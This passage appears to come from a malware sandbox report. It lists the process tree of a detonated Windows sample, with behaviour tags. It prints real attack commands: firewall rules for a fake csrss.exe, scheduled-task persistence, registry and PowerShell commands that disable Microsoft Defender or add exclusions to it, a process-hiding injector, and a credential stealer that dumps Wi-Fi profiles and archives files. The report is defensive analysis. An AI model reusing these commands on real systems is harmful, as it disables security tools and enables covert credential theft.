- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\u2zg.3.exe"C:\Users\Admin\AppData\Local\Temp\u2zg.3.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3868 -s 16645⤵
- Program crash
-
C:\Users\Admin\Pictures\iysAcluMQcM8JDfAwR0llgs6.exe"C:\Users\Admin\Pictures\iysAcluMQcM8JDfAwR0llgs6.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\iysAcluMQcM8JDfAwR0llgs6.exe"C:\Users\Admin\Pictures\iysAcluMQcM8JDfAwR0llgs6.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
-
C:\Users\Admin\Pictures\Fur6VRjhskC9mU3vFPxSIc2H.exe"C:\Users\Admin\Pictures\Fur6VRjhskC9mU3vFPxSIc2H.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Fur6VRjhskC9mU3vFPxSIc2H.exe"C:\Users\Admin\Pictures\Fur6VRjhskC9mU3vFPxSIc2H.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe"C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exeC:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6a99e1d0,0x6a99e1dc,0x6a99e1e85⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\j8F8cQWmBXz0EcdH8M6kRmwS.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\j8F8cQWmBXz0EcdH8M6kRmwS.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe"C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4900 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240428170222" --session-guid=03c3f69b-da01-405d-894b-c080b48c9c23 --server-tracking-blob="NzM4ODk4YmI5NDRjZWYwNTU5ZDU5MjRjMzEwYTcxZDdkOWFlZTA4MThjMDUwYWRhZWE1MGI1MTJlYjA5NjUzZTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MzIzNzM3Ljc1NjYiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiYjc5MTFmNGQtODE0Ny00ODFmLWEwOWUtZTI0ODMyMjFkZDY4In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5C040000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
-
C:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exeC:\Users\Admin\Pictures\j8F8cQWmBXz0EcdH8M6kRmwS.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.68 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x69fbe1d0,0x69fbe1dc,0x69fbe1e86⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404281702221\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xa76038,0xa76044,0xa760506⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\AUWFjIOuq4vJkCnAMCpu3BX3.exe"C:\Users\Admin\Pictures\AUWFjIOuq4vJkCnAMCpu3BX3.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSD1B7.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD1B7.tmp\Install.exe\" Wt /YVydidAJWo 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn biPxHmULFllsbMgnpt7⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn biPxHmULFllsbMgnpt8⤵
-
C:\Users\Admin\Pictures\olLriDTodnhlhNqsfTzJYRiU.exe"C:\Users\Admin\Pictures\olLriDTodnhlhNqsfTzJYRiU.exe"4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\269xoqmLlAArxxjNLYSvtI2S.exe"C:\Users\Admin\Pictures\269xoqmLlAArxxjNLYSvtI2S.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe5⤵
- Executes dropped EXE
-
C:\Windows\SYSTEM32\msiexec.exe"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe"ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\230210488309_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mstc.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2016 -ip 20161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2992 -ip 29921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2528 -ip 25281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3868 -ip 38681⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSD1B7.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSD1B7.tmp\Install.exe Wt /YVydidAJWo 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
